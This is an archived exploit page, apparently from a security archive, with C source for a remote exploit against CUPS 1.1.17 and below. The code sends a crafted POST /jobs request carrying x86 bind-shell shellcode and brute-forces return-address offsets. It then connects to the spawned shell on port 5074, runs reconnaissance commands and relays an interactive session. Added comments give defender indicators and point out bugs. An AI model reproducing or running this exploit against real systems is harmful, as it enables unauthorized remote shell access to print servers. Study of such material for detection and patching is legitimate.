
mod_sigcups.c

mod_sigcups.c
Posted May 31, 2003

Remote exploit for CUPS v1.1.17 and below which spawns a shell as the lp user. Modified version of the original sigcups.c exploit.

tags | exploit, remote, shell
SHA-256 | 5a88fad62d69412d2762fa193f415a3d84cba3182a07cc0ff828178c6b46a28d

mod_sigcups.c


/* DEMOCOW-BRUTE-CUPS.c by democow "the sad cow"
this is a modified version of sigcups.c by sigdoon
i had a need for this, so i wrote this

i am sad because so much open source/public exploit code is abused
by info$ec now any open discussion has become
their helping hand in other words.........
young fish must not eat their tainted worms

TODO:
1. add support for new cups partial request DoS just for fun
2. look through cups source a little more and find a better way to ID
vuln servers
3. improve the server-offset feature
4. add arm shellcode,and libc addrs
5. add hostlookups

THIS CODE IS PRIVATE, DO NOT DISTRIBUTE... DO NOT SUPPORT THE INFO$EC
INDUSTRY, THEY ARE EXPLOITING YOU WITH YOUR EXPLOITS
democow8086@hotmail.com
*/

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <getopt.h>

// Size in bytes of each local buffer in buildAttack() and shellConnect().
#define BUF_SIZE 4096
// Server banner prefix. It is defined here but not referenced anywhere in the
// visible code; the header TODO mentions wanting a better way to ID servers.
#define SERVER_ID "CUPS/1.1" //8 bytes long

// die(a): print "[!] <a>: <errno text>" through perror() and exit with status -1.
// The argument must be a string literal, because it is pasted next to "[!] ".
// NOTE(review): exit() is called but <stdlib.h> is not in the visible include list.
#define die(a) { perror("[!] "a); exit(-1); }

//this will be added to when the correct offsets for
//certain systems have been found
// Per-system record with a numeric type, an OS description string and an offset.
// presumably the offset is the value buildAttack() adds to retaddr; confirm.
// NOTE(review): no object of this type is created in the visible code, and the
// typedef name "target" is shadowed by locals of the same name in shellConnect()
// and main().
typedef struct identified
{
int type;
char os[1040];
int offset;
}target;

// buildAttack: open a TCP connection to host:port and write one crafted
// HTTP POST request, then close the socket.
//
// offset  added to the hard-coded base value in retaddr; negative values are refused
// host    IPv4 address in dotted-quad text form (goes straight to inet_addr(),
//         so host names are not resolved)
// port    TCP port to connect to; main() always passes 631
//
// Returns 0 once both write() calls have been issued, and 1 when offset is
// negative or when socket() or connect() fails.
//
// Defender notes: on the wire this is "POST /jobs HTTP/1.1" with a
// form-urlencoded body that starts with '-', a large decimal number and '=',
// followed by a long unbroken run of %XX-encoded bytes. The page lists the
// affected releases as CUPS 1.1.17 and below, so the checks that matter are the
// installed CUPS version and which networks can reach port 631.
//
// NOTE(review): strlen(), bzero() and inet_addr() are used without their
// headers appearing in the visible include list.
int buildAttack(int offset,char *host, int port)
{
// Opaque x86 machine-code payload, sent percent-encoded in the request body.
// The byte pair 0x13 0xd2 inside it equals 5074, the port that shellConnect()
// tries afterwards, so the raw bytes and that port are usable as indicators.
char hellcode[]=
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x13\xd2\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";


struct sockaddr_in dest;
int i,off,sock;
// Hard-coded base value; the caller's offset is added to it below.
unsigned long retaddr = 805289688;
// buf holds the request body, buf2 the request line and headers.
char buf[BUF_SIZE];
char buf2[BUF_SIZE];

// Header template; %d is filled with the byte length of the body.
char greet[] = "POST /jobs HTTP/1.1\nContent-type: application/x-www-form-urlencoded\nContent-length: %d\n\n";

// Body prefix template: '-', retaddr in unsigned decimal, then '='.
char evilmsg[] = "-%u=";

//it is just sad to have an integer overflow
//within an integer overflow exploit
if(offset < 0)
{
printf("[*] integer overflow alert please increase the size of offset\n");
return 1;
}

retaddr += offset;

printf("[*] connecting to %s port %d\n", host, port);
// NOTE(review): retaddr is an unsigned long but is printed with %x here and
// formatted with %u further down.
printf("[*] trying retaddr = 0x%x; *4 = 0x%x\n", retaddr, retaddr*4);
printf("[*] the current offset is %i\n",offset);

if ( (sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))<0)
{
perror("socket()");
return 1; //return fail
}

dest.sin_family = AF_INET;
dest.sin_port = htons(port);
dest.sin_addr.s_addr = inet_addr(host);
bzero( &(dest.sin_zero), 8);


if(connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr))<0)
{
perror("connect()");
return 1; //return fail
}

printf("[*] connect created attempting to brute\n");
// off is the length of the "-<number>=" prefix now at the start of buf.
off = sprintf(buf, evilmsg, retaddr);

// Append every payload byte as a three-character %XX escape; sizeof-1 skips
// the array's terminating NUL.
for(i = 0; i<sizeof(hellcode)-1; i++)
sprintf(buf+off+i*3, "%%%02X", (unsigned char)hellcode[i]);

//load greet
sprintf(buf2, greet, strlen(buf));

//send our crafted data out
// Headers go out first, then the body; neither write() result is checked.
write(sock, buf2, strlen(buf2) );
write(sock,buf, strlen(buf) );

close(sock);
return 0; //attack sent :) be happy you sad cow
}

//this will verify if the exploit worked
// shellConnect: wait three seconds, try to connect to TCP port 5074 on host
// and, if that works, relay bytes between the socket and the terminal.
//
// host  IPv4 address in dotted-quad text form (passed to inet_addr())
//
// Returns 1 when connect() fails and 2 when the established connection ends
// (read() on the socket returns 0 or a negative value). The final return 0 is
// never reached. A socket() failure ends the whole program through die().
//
// Defender notes: an inbound connection to TCP 5074 on a print server a few
// seconds after a POST to /jobs is the observable sign of this step, and the
// first line the client sends is the fixed string written below. Alerting on
// unexpected listeners or inbound sessions on 5074 covers it.
int shellConnect(char *host)
{
struct sockaddr_in target;
fd_set rset;
int socketfd;
int happy = 0;
int incomming;
char buffer[BUF_SIZE];
//i want to let socket() errors end the program in a messy way
if( (socketfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))<0)
die("socket()");

target.sin_family = AF_INET;
target.sin_port = htons(5074);
target.sin_addr.s_addr = inet_addr(host);
bzero(&(target.sin_zero), 8);

//note to democow rewrite this ASAP
// Pauses by spawning a shell that runs "sleep 3".
system("sleep 3");

if(connect(socketfd, (struct sockaddr*)&target,sizeof(struct sockaddr)) < 0)
{
perror("connect");
return 1;//return with exploit fail
} else { happy = 1;}

// Fixed first line sent on the new connection; 27 is the string's exact length.
write(socketfd,"id;uname -a;cat /etc/*rel*\n",27);

// The condition is an assignment and therefore always true; the loop ends only
// through the return in the connection-lost branch.
while(happy =1)
{
FD_ZERO(&rset);
FD_SET(socketfd,&rset);
FD_SET(STDIN_FILENO, &rset);

// Blocks until the socket or standard input is readable; the result of
// select() is not checked.
select(socketfd+1,&rset,NULL, NULL, NULL);

if(FD_ISSET(socketfd,&rset) )
{

// Reads at most BUF_SIZE-1 bytes so the terminator written below always fits.
incomming = read(socketfd,buffer, BUF_SIZE-1);

if(incomming <= 0)
{
printf("[*] Connection Lost Sorry Mate\n");
close(socketfd);
return 2; //return with a conn lost retry
}

buffer[incomming] = 0;
printf("%s", buffer);
}

if(FD_ISSET(STDIN_FILENO, &rset) )
{
incomming = read(STDIN_FILENO, buffer, BUF_SIZE - 1);
if(incomming > 0)
{
buffer[incomming] = 0;
write(socketfd, buffer, incomming);
} //end if(incomming)
}//end STDIN_FILENO check
}//end while
return 0; //this will never be reached
}

// main: take the target IPv4 address from argv[1] and repeat two steps,
// buildAttack() against port 631 and then shellConnect(), raising offset
// between rounds, until buildAttack() reports a failure.
//
// Defender notes: a targeted host sees a series of POST /jobs requests on
// TCP 631 from one source, each followed about three seconds later by a
// connection attempt to TCP 5074. The repetition is a useful correlation
// signal in CUPS access logs and in network flow data.
int main(int argc, char *argv[])
{
int running;
int offset;
char *target;
int temp;
running = 1;
offset = 0;

if(argc < 2)
{
printf("USEAGE %s [IP TO ATTACK]\n",argv[0]);
//this is all one big joke to me
// NOTE(review): presumably meant as a raw exit system call on 32-bit x86
// Linux; confirm. Nothing assigns target on this path.
__asm__("movb $0x01, %al");
__asm__("int $0x80");
} else { target = argv[1]; }

//start the fun loop :)
while(running == 1)
{

// A return of 1 means buildAttack() refused the offset or could not connect.
if( (temp= buildAttack(offset,target,631)) ==1)
{
printf("major connection failure aborting\n");
running = 0; //connection failures are upsetting
return 0;
}

// The case labels are character constants, while shellConnect() returns the
// integers 1 and 2, so as written every return lands in the default arm and
// offset goes up by one per round.
switch ( (temp = shellConnect(target) ))
{
case '1': //general fail.. i except aton of these
offset++;
break;

case '2':
offset = offset; //i could do nothing but dun wanna
break;

case '0': //are we all done?
return 0; //i dont understand why i do this
break;

default:
offset++; //why not
break;

}

}
// Not reached in the visible code: the only assignment of 0 to running is
// followed directly by a return.
printf("you are a beast of your mind mr. cow\n");
return 0;
}




--
This message has been sent via an anonymous mail relay at www.no-id.com.
